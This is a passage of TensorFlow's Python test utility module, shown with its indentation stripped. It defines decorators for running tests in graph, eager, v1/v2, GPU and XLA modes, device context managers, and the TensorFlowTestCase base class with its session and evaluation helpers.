returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
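# Illustrative sketch (not part of the original module): running a test body
# both without a horizon and with a far-future horizon. The class and method
# names below are hypothetical.
#
#   class CompatTest(googletest.TestCase):
#
#     @with_forward_compatibility_horizons(None, (2099, 1, 1))
#     def test_new_op_kernel(self):
#       ...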
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was built with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since the routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support). However, no changes are made here because:
++ Changing the name "cuda_only" to something more generic would break
backward compatibility.
++ Adding an equivalent "rocm_only" would require the implementation to check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility.
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only".
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
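# Illustrative sketch (not part of the original module): the context managers
# above pin op placement inside a test body, e.g.
#
#   with device(use_gpu=False):   # equivalent to force_cpu() here
#     z = math_ops.add(1.0, 2.0)
#
# device(use_gpu=True) falls back to the CPU when no GPU is available, whereas
# force_gpu() unconditionally requests "/device:GPU:0".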
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able to
call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
      # of tf.data tests hard to read, because OutOfRangeError is used to
      # signal completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
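# A hedged usage sketch for the decorator above (the test name and body are
# illustrative assumptions): applying it directly to a test method turns off
# cuDNN and XLA GPU autotuning for the duration of that test.
#
#   @disable_cudnn_autotune
#   def testGraphsAreIsomorphic(self):
#     ...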
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
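# A minimal usage sketch (the reason string and test name are illustrative
# assumptions): decorators built on _disable_test take a human-readable
# description and make the test body a no-op when the feature is enabled.
#
#   @disable_xla("this test exercises a TF-classic-only code path")
#   def testClassicOnlyBehavior(self):
#     ...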
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
  Returns: Function that will decorate a given class's test methods with the
    decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
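# A minimal sketch of using for_all_test_methods as a class decorator (the
# class name and description string are illustrative assumptions):
#
#   @for_all_test_methods(disable_xla, "none of these ops have XLA kernels")
#   class MyOpsTest(TensorFlowTestCase):
#
#     def testOpA(self):
#       ...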
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
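# A minimal usage sketch (the test name and body are assumptions): the
# decorator above is applied per test method with a short justification
# string describing why TensorFloat-32 must be disabled.
#
#   @run_without_tensor_float_32("assertAllClose on float32 matmul results")
#   def testMatmulMatchesNumpy(self):
#     ...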
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
  be used with complex64.
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
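# A hedged usage sketch for matmul_without_tf32 (tensor names are
# illustrative): use it when the matmul is only a helper for checking some
# other op, so reduced TensorFloat-32 precision should not affect the test.
#
#   sqrt = tf.linalg.sqrtm(x)
#   self.assertAllClose(matmul_without_tf32(sqrt, sqrt), x)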
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
    # is_mlir_bridge_enabled() returns None, the user did not explicitly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests from different runs cannot pollute
    each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
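  # A minimal usage sketch (the proto import and node are illustrative
  # assumptions, not part of this class): assertProtoEquals accepts either a
  # proto instance or its text-format representation.
  #
  #   node = node_def_pb2.NodeDef(name="x", op="Placeholder")
  #   self.assertProtoEquals('name: "x" op: "Placeholder"', node)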
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
